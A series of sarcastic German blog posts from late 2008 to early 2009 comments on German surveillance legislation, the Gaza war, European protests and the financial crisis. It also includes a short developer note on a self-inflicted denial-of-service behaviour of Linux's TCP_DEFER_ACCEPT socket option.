Dieser Typ hat nicht nur Balls of Steel, der hat auch Nerven wie Monofilamentfasern.

Thu Jan 29 2009

[l] Boah dieser Kauder von der CDU! Was der schon wieder von sich gibt!
Siegfried Kauder von der CDU/CSU-Fraktion räumte ein, dass die Strafbarkeit vorverlagert werden solle, um Ansatzpunkte für Ermittlungsmaßnahmen zu haben. Heute würde kein Richter bei einem vagen Verdacht etwa eine Telekommunikationsüberwachung zulassen. Die vorgeschlagenen drei neuen Paragraphen würden den Fahndern dagegen mehr Möglichkeiten für das Abhören oder die Wohnraumüberwachung eröffnen. "Wer Sicherheit in Deutschland liebt, muss diesem Gesetz zustimmen", sagte der CDU-Politiker.
Da hab ich echt Schwierigkeiten, mein Abendessen bei mir zu behalten.
Vor allem: so plump! So völlig ohne Finesse! Was haben wir uns in der Schule vorbereitet, die Schüler gegen die Schlangenzungen geschickter Demagogen vom Kaliber Göbbels zu stählen, und dann wird unsere Freiheit von solchen unkultivierten Holzhammer-Parolensprechblasenwerfern kaputt gemacht! Perlen vor die Säue! Und die Kinder, die in der Schule aufgepasst haben, die verhaften sie bei G8, nachdem sie die Bundeswehr gegen sie eingesetzt haben und False Flag Operationen gegen sie durchgeführt haben.
Wenn da wenigstens ein intelligenter Plan hinter wäre. Dann könnte ich wenigstens das Gefühl entwickeln, in einem fairen Kampf ehrenhaft verloren zu haben. Aber so? Die faseln da die ganze Zeit von "wehrhafter Demokratie", und dann fallen wir dem erstbesten Marodeur zum Opfer. Und was da für marodierende Orkhorden durch unsere Politik ziehen! Schaut euch nur mal an, auf welchen neuen Tiefpunkt die SPD gestürzt ist:
Wenn die erste U-Bahn in Deutschland hochgehe, würde auch die Opposition als erstes auf die Koalitionslinie einschwenken, meinte Joachim Stünker von der SPD-Fraktion, und ermahnte gleichzeitig die Kritiker für ihre Wortwahl, mit der sie "die Schmerzgrenze überschritten" hätten.
Wer hätte das gedacht, dass die aus dem Liegen im Loch im Keller noch stürzen können!
Keiner müsse Angst haben vor dem Gesetz, da die Verdächtigen im Zweifelsfall natürlich freigesprochen würden.
Aha. Soso. Und dann kommt folgende beruhigende Aussage:
Zudem müssten neben dem Besuch eines Terrorcamps oder dem Herunterladen von Sprenganleitungen Planungen für ganz konkrete Tatbestandsmerkmale wie Mord, Totschlag oder Menschenraub vorliegen.
Seufz. Tja, so ist das eben heute. In der Regierung hat offensichtlich niemand das Gesetz vor dem Kommentieren gelesen. Wieso sollte denn jemand ein Terrorcamp besuchen, wenn er nicht den Vorsatz hat, Leute in die Luft zu sprengen? Da wird der Staatsanwalt nicht groß Vorsatz nachweisen müssen, die bloße Aussage eines "Sachverständigen", dass es sich um ein Terrorcamp handelt, wird reichen, um den Vorsatz zu beweisen.
Ich würde ja gerne verstehen, was wir falsch gemacht haben, dass unser System so derartig degenerieren konnte über die paar Jahre, die unser Staat nun existiert. Sind wir besonders korrupt als Volk? Die Briten haben ihr Rechtssystem seit hunderten von Jahren, und das ist zwar auch schlecht und korrupt, aber hat doch deutlich länger gehalten, bevor sie den totalen Überwachungsstaat eingeführt haben.
Oder ist das vielleicht so ein Zeitgeist-Ding, dass die Systeme alle gerade jetzt durchrosten?
Wir sollten mal das Meckern runterschrauben und mit der Forschung anfangen, wie wir so schnell so tief abstürzen konnten, damit das in der nächsten Runde nach der Revolution nicht auch wieder so schnell so schlimm wird.
Oh apropos schlimm. Nichts ist ja so schlimm, dass die Zypries es nicht noch schlimmer machen könnte:
Zuvor hatte Bundesjustizministerin Brigitte Zypries betont, "dass Deutschland im Fokus des internationalen Terrorismus steht". Die Drohvideos der vergangenen Tage hätten deutlich gemacht, dass die Politik die Gefahren ernst nehmen und die Bürger mit Betreten "juristischen Neulands" schützen müsse.
Die … Drohvideos? DAS ist unsere Bedrohung? Mir fällt da ja immer der Putin ein, wie der nach dem Irakkrieg meinte, also ER hätte ja im Irak Massenvernichtungswaffen gefunden an Bushs Stelle. Aber unsere Politiker sind an Inkompetenz auf Augenhöhe mit Bush und können sich nicht mal einen glaubwürdigen Terrorangriff aus dem Arsch ziehen.

Fri Jan 23 2009

[l] Lacher des Tages: der Obama-Crackberry soll einen von der NSA "virensicher" gemachten Internet Explorer haben. WTF?!

Wed Jan 21 2009

[l] Versteckte Botschaften in Videos? Sowas kennt man von der Werbung und Filmen von John Carpenter, aber jetzt auch beim ehemaligen Nachrichtenmagazin aus Hamburg. Bei 0:53 oben rechts in der Rauchwolke. Ich habe mal Screenshots gemacht: eins und zwei. Krasse Scheisse.
Update: Stellt sich raus, dass diese Botschaften schon im Originalvideo drin sind (bei 2:54)! (Danke, Witschi)
[l] Erinnert ihr euch an die Meldung, dass Israel die arabischen Parteien nicht zur Wahl zulassen wollte? Nun, das hat der Supreme Court gerade widerrufen. Damit zählt Israel zwar nicht mehr als "managed democracy", wie die Amis immer sehr schön das Putin-Modell bezeichnet haben, aber eine Demokratie ist trotzdem was anderes. Das haben sie sich mit dem Versuch verspielt. Genau wie sich unsere Junta mit der Aufhebung der Unschuldsvermutung über "präventive" Massnahmen den Rechtsstaat-Stempel verspielt hat.
Trotzdem, bei allem Gefrotzel: das ist ein guter Tag für Israel. Da haben sie gerade echt Boden wieder gut gemacht. (Danke, Mathias)
[l] Ist zwar noch kein Bürgerkrieg, aber ein bisschen V-for-Vendetta Feeling kommt ja schon auf, wenn man das hier liest. In Island hat das Parlament seine erste Sitzung nach der diesmal etwas längeren Weihnachtspause gemacht, und die Bürger haben ihrem Unmut wie folgt Luft gemacht:
The building was splattered with paint and yoghurt, the crowd yelled and banged pans, fired rockets at the windows and lit a bonfire in front of the main door. Riot police moved in.
Auch in Lettland gab es ziemlich grosse Proteste, gemessen an der Größe der Bevölkerung:
In Latvia – where growth has been in double-digit figures for years – anger is bubbling over at official mismanagement. GDP is expected to contract by 5 per cent this year; salaries will be cut; unemployment will rise. Last week, in a country where demonstrators usually just sing and then go home, 10,000 people besieged parliament.
Und nach diesen beiden bereits Fällen gibt es auch einen Neuzugang: Bulgarien.
Bulgaria has been gripped this month by its worst riots since 1997 when street power helped to topple a Socialist government. Now Socialists are at the helm again and are having to fend off popular protests about government incompetence and corruption.
Das einzige Land, wie die Leute mal wieder alles schlucken, ist Deutschland. Das liegt aber auch daran, dass unsere Junta Erfahrung mit Protesten hat, und in Heiligendamm gezeigt hat, wie sehr man die Rechte der Bürger im Zweifelsfall mit Füssen zu treten gewillt ist. Und in Berlin muss man sich gar nicht dem Parlament zu nähern versuchen, um von der Riot Police plattgeknüppelt zu werden.

Thu Jan 15 2009

[l] War ja klar: Unsere Umfaller-Provider machen bei der Internet-Zensur mit. Unsere Industrie hat noch immer bei sowas mitgemacht. Die haben auch Nazi-Gelder gewaschen, Giftgas geliefert, Waffen für die Wehrmacht gebaut, die haben bei der ETSI Schnüffelstandards beschlossen und dann implementiert, und jetzt eben Internet-Zensur. Zum Kotzen, dieses Land der Blockwarte und Mitläufer. Und die von der Leyen mag zwar blond sein, aber das widerliche Mitläufertum in diesem Lande hat sie klar erkannt:
"Wir brauchen zwei, drei Mutige, die vorangehen, und die gab es bei dem Treffen", sagte die CDU-Politikerin am heutigen Donnerstag in Berlin.
Da kommt mir ja das Mittagessen wieder hoch
[l] Oops. Israel schiesst die UN-Zentrale im Gazastreifen mit Phosphorgranaten in Brand. Dabei war das doch bloss als Nebelwerfer gemeint!1!!
Israel hat sich inzwischen entschuldigt: Ban erklärte, Barak habe von einem "schwerwiegenden Fehler" gesprochen und versichert, dass sich so etwas nicht wiederholen werde.
Ab jetzt werden Uno-Gebäude also nur noch mit konventioneller Artillerie plattgemacht. Noch ein bemerkenswertes Detail:
Der große Komplex, in dem die in Gaza aktiven UN-Hilfsorganisationen ihre Büros haben, beherbergt auch ein riesiges Treibstofflager für die UN-Fahrzeuge.
Mei wäre das bedauerlich gewesen, wenn das von den Phosphor-Brandbomben zur Explosion gebracht worden wäre. Da hätte ja auch hinterher niemand mehr feststellen können, warum das jetzt genau explodiert ist! Aber hey, Unfälle passieren halt.
Update: Und als wenn die UNO noch nicht genug Probleme hätte, jetzt installieren sie auch noch SAP! OH NEIN!!! (Danke, Matthias)

Sat Jan 10 2009

[l] Russland hat das Gas ausgemacht, Energie ist alle, da schaltet die Slowakei ein an sich abgeschaltetes Atomkraftwerk wieder an. Was sollen die auch machen, frieren? Und der Ministerpräsident teilt im Fernsehen mit, dass ihm bewusst ist, dass er damit den EU-Beitrittsvertrag verletzt und dafür die Verantwortung übernimmt.

Fri Jan 9 2009

[l] 91% der Israelis unterstützen das Gaza-Massaker. Aber immerhin vier Prozent waren dagegen. Und die Polizei greift hart durch:
Etwa 600 Demonstranten wurden bislang festgenommen, 225 sitzen immer noch in Haft, 176 sind angeklagt, meist wegen Ruhestörung und Behinderung des Straßenverkehrs. Das schreiben Israels Medien in den wenigen Artikeln, die sich den Abweichlern widmen. Die israelische Polizei nannte auf Nachfrage von SPIEGEL ONLINE keine genauen Zahlen. "Es gibt mehr als 300 Verhaftete", sagte ein Polizeisprecher.
Und natürlich Zweiklassenjustiz:
Die Polizei habe alle Demonstranten verhaftet, obwohl diese nach Aufforderung durch die Beamten den Weg freigemacht hätten, sagt Manor, die den Vorfall auf Video dokumentiert hat. Erst nach drei Tagen seien sie freigekommen. "Wir hatten noch Glück, weil wir israelische Juden sind", sagt Manor. "Die meisten, die heute noch in Haft sitzen, sind Palästinenser mit israelischem Pass." Menschenrechtsorganisationen in Israel bestätigen, dass die meisten noch Inhaftierten israelische Araber sind.

Wed Jan 7 2009

[l] Da sieht man mal wieder, wie toll Privatisierung funktioniert: Die Bahn hat aus Geldspargründen die Berliner S-Bahn nicht winterfest gemacht und die Züge sind prompt liegen geblieben.

Tue Jan 6 2009

[l] Falls ihr nicht eh alle schon die Nase voll habt vom Krieg in Israel…
1. Erinnert ihr euch, dass Israel eines der Länder war, die die Clusterbomben-Ächtung nicht mitgemacht haben? Jetzt wissen wir warum.
2. Hier erzählt der Guardian mal, was da passiert. Meine Kurzzusammenfassung: Israel hat Hamas mit ihren Schikanen und Blockaden und Provokationen gezwungen, den "ersten Schritt" zu gehen.
3. Uri Avnery in Übersetzung bei Telepolis dazu.
4. Und hier lässt der Guardian sogar einen der Hamas-Führer zu Wort kommen.
Der wirklich überraschende Teil für mich ist ja, dass auch unsere Mainstream-Medien langsam merken, wie der Hase läuft. Ich klicke gerade auf tagesschau.de herum und sehe da die folgenden Meldungen zum Thema:
- Der Bevölkerung im Gazastreifen geht es dreckig, Hilfsorganisationen appellieren.
  Es fehle zudem an Medikamenten und Betäubungsmitteln, und selbst an Leichensäcken und Tüchern, um die Toten zu bedecken.
- Krankenhäuser haben zu wenig Blutkonserven.
- Die Wut in der arabischen Welt über Tatenlosigkeit wächst (vgl Uri Avnery über Ägypten oben)
- ARD-Kommentar: "Der Grundfehler ist die pro-israelische Schlagseite". Er spricht weiter von der "israelischen Besatzungsarmee" und schreibt weiter, wenn es sich bei den 500 Toten um Israelis gehandelt hätte, hätten die EU-Diplomaten ihren Urlaub unterbrochen.
Sollte da tatsächlich ein Aufwachen stattfinden? Dauert ja auch schon lange genug, der Dornröschenschlaf der Medien. Aber hey, ich finde wir schenken Israel erst mal noch ein paar Atomuboote zu unseren Atombomben dazu! Die perfekte Gelegenheit! Und falls die gerade nicht zahlen möchten, "finanzieren" wir ihnen den Deal am besten wieder. Bis sie dann Holocaust sagen.
Update: Das waren Phosphor-Brandbomben, keine Clusterbomben. Die kommen wahrscheinlich auch noch.

Mon Jan 5 2009

[l] Na toll, geht ja gut los, das neue Jahr. Die Briten (wer auch sonst) drängen darauf, aus dem Bundestrojaner einen EU-Trojaner zu machen, und natürlich auch ohne richterliche Genehmigungen. Und wenn wir uns beim Thema Überwachung nach jemandem richten sollten, dann nach den Briten! Seht nur, wie toll das bei denen gegen die Kriminalität geholfen hat! Rekord-Kriminalitätsraten und die Knäste sind auch alle voll. Tolle Arbeit, liebe Briten. Das brauchen wir unbedingt auch!1!!
Und da können auch die Inder nicht zurück stehen: Die Inder wollen Telefon- und Internet-Abhören bei jeder Straftat erlauben.
Nicht nur gegen Kinderpornographie will Indien zugleich scharf vorgehen, sondern auch jegliche obszönen Darstellungen verbieten lassen. Ein Unterschied zwischen Produzenten und Nutzern wird dabei nicht gemacht. Auch wer Porno übers Internet allein anschaut, steht damit bereits mit einem Fuß im Gefängnis. Ihm drohen bis zu zwei Jahre Haft. Selbst niedere Polizeibeamte dürfen beim Verdacht auf illegalen Pornokonsum etwa Wohnungsdurchsuchungen durchführen.
Constable, da hinten sieht jemand zu zufrieden aus, der hat bestimmt kürzlich zu einem Porno masturbiert!1!!

Tue Dec 30 2008

[l] Whoa, was für ein grandioser Congress! Ein Hammer nach dem nächsten. Wir haben gezeigt, wie man per SS7 Handys ortet, wie man Ciscos zuverlässig exploitet, wie man das Iphone hackt, wie man trotz Cold Boot den RAM-Inhalt auslesen kann, wie man das Internet über DNS herunterfährt, oder wenn das nicht klappt wie man sich ein CA Zertifikat bastelt, um sich für beliebige Domains von Browsern akzeptierte Zertifikate zu bauen, wie man wie man verschlüsselten PHP-Bytecode dekompiliert, wie man Symbian hackt, (mein persönlicher Lieblingstalk:) wie man sich aus Handschellen heraus lockpickt, wie man sein Wii hackt und darauf Linux installiert, wie man sich sein eigenes GSM-Netzwerk baut, wie man ein Botnet plattmacht, und wir haben DECT den Gnadenschuss versetzt. Ich für meinen Teil bin hoch erfreut, was für eine grandiose Show das war. Mir hat leider jemand mein Audiokabel geklaut, sonst hätte ich noch mehr schöne HD-Aufnahmen gemacht.

Sat Dec 27 2008

[l] Krass. Wir werden förmlich plattgetrampelt beim Congress! Die Dauertickets sind alle, die Armbändchen sind auch alle. Im Moment kriegen Leute dann halt vier Tagesbändchen, aber das nähert sich auch bald dem Ende. Nächstes Jahr werden wir dann wohl doch mal woanders hinziehen müssen. ICC? Messehallen? So viele Optionen gibt es da gar nicht mehr. Whoa!
Inhaltlich bin ich mit dem Congress bisher zufrieden. Es fühlt sich zwar alles viel zu voll an, und es sind auch in letzter Zeit noch ein Dutzend Vorträge oder so ausgefallen. Aber unter dem Strich kommt es mir weniger hektisch vor als in den letzten Jahren. Mein Hackertools-Podium lief ganz gut, wie ich fand. Ich habe hier schon ein paar HD-Mitschnitte gemacht, von der Keynote, von Terrorist All-Stars, von der Festplattenbeschlagnahme und von den Datenverbrechen. In Saal 2 und 3 versuche ich gar nicht erst reinzukommen. Da werde ich mir dann die FEM-Aufnahmen anschauen später. :-)

Tue Dec 23 2008

[l] Wenn ihr denkt, die erzählen uns hier gerade die Wahrheit über die Finanzkrise, mit den Wirtschaftsweisen und ihrem "3% weniger" Gefasel, dann guckt euch mal an, wie es Japan gerade ergeht: in Japan sind die Exporte um 26,7% zusammengebrochen. Und was verkaufen die Japaner? Autos (Check!) und Gadgets. Autos sind auch bei und sehr wichtig und brechen auch bei uns gerade komplett weg, aber wer kauft denn in Zeiten wie diesen unseren Maschinenbauern ihre Geräte ab? Wenn er ausserdem keinen Bankkredit kriegt, um das zu finanzieren? Ich glaube, das wird noch richtig haarig. Aber sowas lässt sich ja nicht verschweigen, das werden wir ja sehen, wenn hier alles zusammen bricht. Und das wird es, denn wir Idioten haben voll auf den Export gesetzt und gar nicht auf die Binnennachfrage. So sind wir genau von den Exporten abhängig, und die brechen ja gerade weltweit zusammen. Tolle Politik, die wir da gemacht haben.
[l] Ich habe gerade Weihnachten gerettet, indem ich den Weihnachtsbaum mit der Säge aus dem Leatherman zum Ständer passend gemacht habe. Geek-Weihnachten kann kommen! Im Übrigen wünsche ich meinen Lesern ein frohes Fest, einen schönen Congress und ein besseres neues Jahr.

Mon Dec 22 2008

[l] Harhar, die ganzen "jüdische Weltverschwörung" Antisemiten beissen sich gerade an Madoff fest.
Some said that only Jews could perpetrate a fraud on such a scale. Others came up with conspiracy theories about Madoff stealing money to benefit Israel. […]
The fact that he seems to have defrauded a large number of Jewish charities seems to have passed the racist goons by.
Noch ein lustiges Statement:
The ADL points out that it is traditional to bash Jews in a time of financial crisis
Tradition! Schönes Wort dafür. Haben wir schon immer so gemacht!1!!
Update: Alleine 2 Milliarden Dollar sind den Mitgliedern einer einzigen New Yorker Synagoge verloren gegangen.

Sun Dec 21 2008

[l] Sogar innerhalb der Regierung ist die Gesundheitskarte nur noch eine Lachnummer. Aktueller Anlass: das CAST-Forum, eine weitgehend unkritische Bauchpinsel-Veranstaltung der deutschen IT-Klüngel, ungefähr so inspirierend wie Technology Review, das Jubelperser-Veranstaltungs-Analogon zu Hurrajournalismus. Da haben sie einen Herrn Margraf vom Innenministerium am Start gehabt, der da die frohe Botschaft vom e-Personalausweis gepredigt hat. Und der ist so überflüssig wie ein Kropf, so begehrt wie Lepra, so fortschrittlich wie … naja, wie die anderen sinnlosen Arbeitsbeschaffungsmassnahmen für die Bundesdruckerei, die sie in den letzten Jahren gemacht haben. Völlig überraschend hat das auch das Publikum beim CAST-Forum gemerkt und kritisch hinterfragt, und da kam dann folgende Ansage:
"Der erste Bürger, der am 01.11.2010 einen Ausweis erhält, soll bereits eine ganze Palette an Anwendungen vorfinden." Zweifel der Zuhörer am ehrgeizigen Projekt zerstörte Margraf mit der Bemerkung: "Wir sind das Bundesinnenminsterium, nicht das Bundesgesundheitsministerium."
ROTFL! (Danke, Kristian)

Fri Dec 19 2008

[l] Die US-Banken wollten ihre Anteile an Chinesischen Banken verkaufen, um ihre Kapitalbasis zu verstärken, aber die Chinesische Regierung hat sie nicht gelassen. Lu-pen-rei-ne Marktwirtschaftler, da in China! Die Bank of America hatte ca drei Milliarden Dollar reinholen wollen durch den Verkauf ihrer Anteile 15% unter Wert, und hatten auch Käufer, aber die Chinesen haben ein Meeting mit dem BoA-Chef gemacht, mit "Konsequenzen" gedroht, und daraufhin hat BoA das abgeblasen. Wow.
"Nach diesem Fall wird auch anderen ausländischen Investoren klar, dass sie es nicht selbst sind, die den Zeitpunkt ihres Ausstiegs bestimmen - sondern Chinas Regierung", sagte ein Insider.
Größter Deutscher Investor ist die Allianz.

Thu Dec 18 2008

[l] Hurra! Indien ist jetzt sicher vor Terroranschlägen! Wie haben sie das gemacht, fragt ihr? Nun, sie haben von den Russen ein paar MiG-29 gekauft und bei Neu Delhi stationiert. Wie das gegen Terroristen hilft? Nun lasst euch doch mal nicht von solchen Details aufhalten!1!!

Wed Dec 17 2008

[l] In Sizilien haben sie die Tage eine Monster-Razzia gegen die Mafia gemacht und 99 Menschen verhaftet. Einer der Bosse ist jetzt in seiner Zelle erhängt aufgefunden worden. Ich bin mir sicher: klarer Fall von Selbstmord. (Danke, Thomas)
[l] Wow. Auf Platz 8 der Heise Downloads des Jahres ist TrueCrypt. Da hat der Schäuble ja Nägel mit Köpfen gemacht. Die Bevölkerung weiss offensichtlich Bescheid, wo es hingeht.

Tue Dec 9 2008

[l] In Athen weihnachtet es sehr. Die Demonstranten hatten gestern ja die Innenstadt von Athen "besetzt" und der Polizei war das Tränengas ausgegangen, weshalb sie zum Steinewerfen übergingen.
Übrigens, echt interessant ist auch diese kleine Geschichte über Proteste in Griechenland, u.a. hat da die Junta 1973 mit Panzern einen Studentenprotest plattgemacht und seit dem steht in der Verfassung, dass die Polizei nicht Schulen oder Universitäten betreten darf. Daher gehen die Proteste jetzt von den Schulen und Unis aus, wo die Professoren auch mal drei Tage Streik ausgerufen haben, damit die Zeit zum Protestieren haben :-)

Mon Dec 8 2008

[l] In Kalifornien gibt es jährlich eine Aktion, wo Bürger anonym ihre Schusswaffen abgeben können, die werden dann kaputt gemacht, und dafür gibt es Konsumgutscheine. Normalerweise sowas wie ein $100 Gutschein für Best Buy (sowas wie Mediamarkt) oder Target (sowas wie Karstadt).
Dieses Jahr wollten die Leute Gutscheine für den Supermarkt, um sich Essen kaufen zu können.
Und der Lacher ist, womit die Leute da alles ankommen:
Deputies were counting the weapons collected and expected to gather about 1,000. Authorities said 590 guns and two hand grenades were handed in during the last weekend in November, more than the total collected in any year and eclipsing last year's 387 guns. […]
One man brought in a Soviet-era semiautomatic carbine.
Diese Amis!

Sat Dec 6 2008

[l] Polizeiarzt, dessen Brechmitteleinsatz einen Schwarzen getötet hatte, freigesprochen. Es geht um einen Mann aus Sierra Leone, von dem sie annahmen, dass er Kokain geschluckt habe. Anscheinend ist das Standard bei unserer Drogenfahndung, Verdächtigen Brechmittel zu verabreichen. Da kann ich ja nur drei Kreuze machen, dass ich noch nie des Drogenschmuggels verdächtig war am Flughafen. Menschenwürdige Behandlung ist was anderes.
Jedenfalls… dieser besagte Polizeiarzt hat das so grob falsch gemacht, dass der Mann gestorben ist.
Die Staatsanwaltschaft hatte ihre Anklage gegen V. auf das Gutachter zweier Sachverständiger gegründet. Ihnen nach war Condé "still ertrunken", weil das Wasser, das ihm V. per Nasensonde eingeflößt hatte, in die Lunge gelaufen war. Zwei weitere Gutachter hatten im Laufe des Prozesses diese Diagnose bestätigt.
Unfassbar! Wasser per Nasensonde? Das läuft in die Lunge, und der ARZT merkt das nicht?!? Aber wartet, wird noch schlimmer. Was macht die Verteidigung? Treibt allen Ernstes vier weitere Sachverständige auf, die Gegengutachten gemacht haben, dass der spontan an einem Herzschaden verstorben sein soll. Äh, ja, klar. Natürlich. Warum plädiert ihr nicht gleich auf einen klaren Fall von Selbstmord?
Zwar habe sich V. "mehrerer objektiver Pflichtverletzungen" schuldig gemacht, die ursächlich für den Tod waren, so die Richter. Weil er dies aber wegen "mangelnder Ausbildung und Erfahrung mit Brechmittelvergaben subjektiv nicht erkennen" konnte, folgte die Kammer dem Antrag der Anklagebehörde.
Na dann haben wir ja auch in Zukunft nichts zu befürchten. Wir können Leute zu Tode foltern, solange der Ausführende bloß zu inkompetent ist, um zu merken, dass das Opfer gerade stirbt. In diesem Fall ist der ins Koma gefallen, der Notarzt musste ihn behandeln, und der Arzt hat trotzdem weiter gemacht. Tolles Land, in dem wir da leben.
Vor allem muss man das ja mal bei einer anderen Mord oder Totschlag probieren. "Klar hab ich ihn totgeschlagen, aber ich wusste nicht, dass man von sowas sterben kann!" (Danke, Torsten)

Wed Dec 3 2008

[l] Auch Canon möchte anscheinend nicht mehr, dass ich ihre Produkte kaufe. Die stellen keine Manuals mehr ins Internet, um Grauimporteure zu behindern. WTF?! Und konstruieren da wild Argumente wie "es gibt keine Garantie, wenn man beim Grauimporteur kauft" (das ist selbstverständlich Unsinn, der Händler muss die gesetzlich übliche Gewährleistung leisten). "Die Bedienungsanleitung fehlt" (die fehlt ja jetzt auch bei den Originalprodukten; ich lese meine Handbücher immer am Rechner, auf Papier kann man schliesslich keine Stichwortsuche lostreten). "Eventuell fehlendes Zubehör" (dass ich nicht lache, geht es noch vager?). Und dann unterstellen sie lauter Dinge, um die Händler in die Ecke der organisierten Kriminalität zu stellen, z.B. dass die keine Urheberrechtsabgaben zahlen (1. wer sagt das? 2. vielleicht zahlen die im Kaufland Urheberrechtsabgaben), dass sie keine Gebühren für die Müllentsorgung zahlen (wer sagt das?). Der Händler zahlt also im Ausland für die Ware, Canon hat also schon ihren Profit gemacht, und jetzt haben die tatsächlich ein Gericht gefunden, dass eine einstweilige Verfügung gegen einen Grauimporteur erlassen hat. Da kann ich mir echt nur noch an den Kopf fassen. Denen geht es offensichlich zu gut. Nun, das lässt sich ändern. Von mir sehen die jedenfalls keinen Euro mehr.
Oh Übrigens, auch Sanyo möchte offenbar nicht mehr, dss ich ihre Produkte kaufe. Ich habe bei denen einen HD-Camcorder gekauft, der explizit damit beworben wurde, dass die Aufnahmelänge nur durch die Größe des Flashspeichers begrenzt sei. Das stimmt aber nicht. Bei 4 GB ist das FAT32-Limit erreicht und die Aufnahme bricht ab. Ich kann zwar gleich wieder auf Aufnahme drücken, und dann nimmt er auch weiter auf, aber mir fehlen halt ein paar Sekunden dann. Für Privataufnahmen mag das OK sein, aber ich wollte damit beim Congress ein paar Vorträge aufnehmen. Schade eigentlich, denn ansonsten ist das ein guter Camcorder, wo auch im Detail jeweils jemand nachgedacht hat. Bis auf dieses Detail eben. Dabei kostet es keine drei Codezeilen, um in dem Fall eben nicht abzubrechen sondern in die nächste Datei zu schreiben, wie das bei DVDs auch gemacht wird. Aber der deutsche Kundendienst wollte nicht mal versuchen, in Japan ein Ticket mit dem Featurewunsch für zukünftige Geräte aufzumachen. Tja. Canon und Sanyo fallen damit für mich aus. Weiss jemand, ob andere Camcorder bei 4 GB einen Spillover in die nächste Datei machen können bei FAT32-Flashmedien? Muss ich im Jahre 2008 tatsächlich noch einen Camcorder mit Magnetband kaufen, um lange Aufnahmen machen zu können?!
Update: Jaja, der Händler leistet Gewährleistung, Garantie ist freiwillig vom Hersteller. Auch aus dieser spitzfindigen Perspektive ist das in meinen Augen kein Argument, denn das hat ja Canon entschieden, dass ich dann keine Garantie kriege. Andere Kommentare sagen, ich soll statt Grauimporteur Parallelimporteur sagen. Ich finde ja egal, wie man das nennt. An anderer Stelle (z.B. 3.Welt-Staaten gegenüber) verkaufen wir die Marktwirtschaft damit, dass die unsichtbare Hand des Marktes für faire Preise sorgt, aber bei uns erlauben wir Canon, die unsichtbare Hand des Marktes per einstweiliger Verfügung auszuschliessen. Diese ganze Marken- und Patentgesetzgebung muss weg.

Sat Nov 29 2008

[l] Socket-Hacker, die mein Blog schon lange lesen, erinnern sich vielleicht an dieses Posting, in dem ich beschrieb, dass das Windows Socket API an einer Stelle fundamental kaputt ist. Es ging um einen Hack, bei dem man dem Kernel sagen kann, dass man erst eine Verbindung einkommend signalisiert bekommen möchte, wenn die Verbindung nicht nur zustande gekommen ist, sondern die Gegenseite auch Daten geschickt hat.
Das Problem bei Windows war, dass man da einen AcceptEx-Call mit overlapped I/O losgetreten hat, und der eine Call nahm dann halt eine Verbindung an, und signalisierte erst, wenn der was schickte. Wenn jetzt aber jemand eine Verbindung aufbaute und nichts schickte, dann nahm der Server gar keine Sockets mehr an. Kurz gesagt: ein dummes Denial of Service.
Nun, Linux hat auch sowas:
```
int one=1;
setsockopt(sockfd,IPPROTO_TCP,TCP_DEFER_ACCEPT,&one,sizeof(one));
```
Das habe ich irgendwann gesehen, in libowfat abstrahiert, und dann in gatling eingebaut. Und jetzt stelle ich gerade fest, dass die Linux-Implementation ein sehr ähnliches Problem hat. Nur halt dass nicht ein Socket für das DoS ausreicht.
Ich habe da gerade eine Stunde rum debuggt (weil ich auch in meinem libowfat-Code gerade herum experimentiere und erst dachte, ich hab dabei was kaputt gemacht), bis ich beim Blick auf netstat gesehen habe, dass da 16 Verbindungen im SYN_SENT bzw SYN_RECV Stadium waren (SYN_SENT beim Client und SYN_RECV beim Server, liefen auf der selben Kiste hier), und ein Socket im SYN_SENT ohne dazu gehöriges SYN_RECV. 16 ist genau das Limit, das ich bei listen() als Backlog übergeben hatte. Die Verbindungen zählen also als "halbe Verbindungen", die man aber nicht annehmen kann; vom Problem her mit einer Syn Flood verwandt.
Und da fiel es mir wie Schuppen von den Augen. Das Linux-API ist gut gemeint aber ist in Wirklichkeit ein DoS gegen sich selbst, zumindest in der aktuellen Implementation in 2.6.27. Zu allem Überfluss wird das DoS auch noch von meinem eigenen bei gatling beiliegenden Benchmark-Tool getriggert. Ich hatte gedacht, dass mal bei früheren Versionen getestet zu haben, aber habe keine Aufzeichnungen und bin mir auch gerade nicht mehr sicher. Im Moment ist jedenfalls klar: vor dieser Funktionalität kann ich nur warnen. Benutzt das nicht in eurer Software!
Danke an Johannes, der mich überhaupt erst auf das Problem hingewiesen hat.

Fri Nov 28 2008

[l] Die Britischen Geheimdienste sind anscheinend auch nicht kompetenter als der BND bei ihren Auslandseinsätzen. Whoops, unter den Terroristen in Mumbai sollen Briten gewesen sein. *hust* *hust* da gibt es eine ganz harmlose Erklärung für, wirklich! Oh guckt mal, da drüben, ein dreiköpfiger Affe *wegrenn*
Und an anderer Stelle: In Afghanistan hat der Übersetzer eines britischen Generals die Geheimnisse an den Iran weitergegeben. Den Iran!! HAHAHA! Und guckt mal, der hat von Anfang an einen vertrauenswürdigen Eindruck gemacht:
Daniel James, who had access to the highest echelons of the Nato mission in Kabul, was caught red-handed betraying his country in a series of coded emails.
The Iranian-born soldier, a flamboyant fantasist who styled himself "General James", believed he had been denied promotion because of racism and jealousy.
He told one colleague: "They will have their comeuppance."
James also needed money. He was £25,000 in debt and had four mortgages on flats in Brighton – although he later claimed he would not give away secrets for a million pounds.
Da hätte NIEMAND drauf kommen können, dass der womöglich nicht geeignet ist als Übersetzer!1!!
[l] Oha. Das BKA-Gesetz ist nicht nur im Bundesrat gescheitert, sie hatten nicht einmal eine Mehrheit für das Anrufen des Vermittlungsausschusses. Den hat dann halt die Regierung angerufen. Ich glaube, der Schäuble hat die mir seinem "Enthaltungen zählen wir dann halt nicht mehr" echt sauer gemacht.
Schade nur, dass die SPD schneller umkippt, als der Schäuble Druck auf sie ausüben kann.

Sat Nov 22 2008

[l] Der Schäuble kriegt ja doch ein bisschen Gegenwind für seine Demokratur-Pläne. Aber es gibt ja keinen Sonnenschein, ohne dass der Wiefelspütz da nicht einmal großflächig drauf kackt:
SPD-Innenexperte Dieter Wiefelspütz erklärte dagegen, er könne sich mit dem Vorschlag "inhaltlich durchaus anfreunden", kritisierte aber den Zeitpunkt der Veröffentlichung. "Wenn er aus tagesaktuellen Erwägungen gemacht wird, merkt jeder die Absicht dahinter", sagte er Spiegel Online.
Soso. Abschaffen der Demokratie ist OK mit Wiefelspütz, seine einzige Beschwerde im Moment ist, dass das Timing gerade nicht gut aussieht. Zum Heulen.

Fri Nov 21 2008

